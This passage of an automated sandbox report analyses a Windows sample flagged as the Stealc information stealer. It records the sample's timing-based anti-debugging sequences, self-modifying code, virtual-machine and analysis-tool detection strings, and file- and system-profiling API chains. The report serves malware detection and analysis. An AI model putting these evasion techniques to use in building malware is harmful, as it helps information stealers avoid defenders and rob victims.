                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE16 second address: D9BE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE1A second address: D9BE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0C44DA3FFBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE3B second address: D9BE55 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44EBA8ECh 0x00000008 je 00007F0C44EBA8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F0C44EBA8E8h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0EB4 second address: CE0EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 ja 00007F0C44DA3FE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5491 second address: DA5495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5495 second address: DA54A5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C44DA3FE6h 0x00000008 jns 00007F0C44DA3FE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA54A5 second address: DA54BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44EBA8EEh 0x00000008 pushad 0x00000009 jp 00007F0C44EBA8E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA54BE second address: DA54C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1B2F second address: DB1B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F0C44EBA8E6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9C7D second address: DB9C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEFA3 second address: DBEFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0C44EBA8EDh 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3889 second address: DC388D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC388D second address: DC38A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38A4 second address: DC38D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0C44DA3FE6h 0x0000000f jmp 00007F0C44DA3FF9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3743 second address: DC374D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC374D second address: DC3751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3751 second address: DC376A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F0C44EBA8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e pushad 0x0000000f jnl 00007F0C44EBA8E6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D09 second address: DC7D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D0F second address: DC7D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D14 second address: DC7D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F0C44DA3FEAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEED2 second address: DCEF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F2h 0x00000009 jmp 00007F0C44EBA8EDh 0x0000000e popad 0x0000000f jg 00007F0C44EBA8F9h 0x00000015 jmp 00007F0C44EBA8F3h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEF12 second address: DCEF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF09C second address: DCF0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF390 second address: DCF396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4D5 second address: DCF4F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 jbe 00007F0C44EBA8E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF4F5 second address: DCF4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF63E second address: DCF644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF644 second address: DCF64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF64A second address: DCF64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD010D second address: DD0115 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4851 second address: DD4870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0C44EBA8EAh 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD49CC second address: DD49D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD49D2 second address: DD49E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jno 00007F0C44EBA8E6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD49E3 second address: DD49E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD49E7 second address: DD49FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0C44EBA8EEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6FD2 second address: DD7023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FECh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F0C44DA3FFEh 0x00000011 jg 00007F0C44DA3FFDh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3ACA second address: DF3AE2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44EBA8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0C44EBA8E6h 0x00000012 jbe 00007F0C44EBA8E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3AE2 second address: DF3AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3AF3 second address: DF3B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF54FC second address: DF550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0C44DA3FEEh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF550A second address: DF5511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5511 second address: DF5517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF533A second address: DF5384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 jmp 00007F0C44EBA8F7h 0x0000000e jmp 00007F0C44EBA8F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0800B second address: E08011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08011 second address: E08027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0C44EBA8E8h 0x0000000c jo 00007F0C44EBA8ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08027 second address: E08035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0C44DA3FE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0785F second address: E07865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07865 second address: E0786C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E079DC second address: E079F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E079F8 second address: E07A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F0C44DA3FE6h 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07B34 second address: E07B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0A9F1 second address: E0AA0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AB9D second address: E0ABA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AC21 second address: E0AC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 nop 0x00000007 mov edx, 060826D8h 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F0C44DA3FE8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 63D3F7AFh 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0C44DA3FECh 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AE58 second address: E0AE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AE5C second address: E0AE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AE60 second address: E0AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8037F second address: 4C803DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 add al, FFFFFFF6h 0x0000000c jmp 00007F0C44DA3FF1h 0x00000011 popfd 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0C44DA3FF4h 0x00000022 and al, 00000048h 0x00000025 jmp 00007F0C44DA3FEBh 0x0000002a popfd 0x0000002b mov ch, BAh 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803DA second address: 4C80446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F0C44EBA8EEh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F0C44EBA8F1h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F0C44EBA8F3h 0x0000001e pushfd 0x0000001f jmp 00007F0C44EBA8F8h 0x00000024 sub ax, 5A68h 0x00000029 jmp 00007F0C44EBA8EBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8049C second address: 4C804F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007F0C44DA3FF1h 0x0000000a pushfd 0x0000000b jmp 00007F0C44DA3FF0h 0x00000010 xor ax, BCB8h 0x00000015 jmp 00007F0C44DA3FEBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edx, ax 0x0000002c call 00007F0C44DA3FF0h 0x00000031 pop eax 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A5B7 second address: D2A5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A5BD second address: D2A5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B719EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B71933 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D24B09 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DAA822 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00924570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00923EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911160 GetSystemInfo,ExitProcess,0_2_00911160
                Source: file.exe, file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarea5
                Source: file.exe, 00000000.00000002.1786322649.0000000000712000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13579
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13582
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13633
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13593
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,000000000_2_009145C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929750 mov eax, dword ptr fs:[00000030h]0_2_00929750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009278E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00929600
                Source: file.exe, file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00927B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00927980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00927850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00927A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
